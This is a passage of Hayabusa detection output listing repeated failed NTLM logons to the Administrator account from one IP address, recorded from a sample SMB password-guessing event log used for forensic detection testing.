01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.052 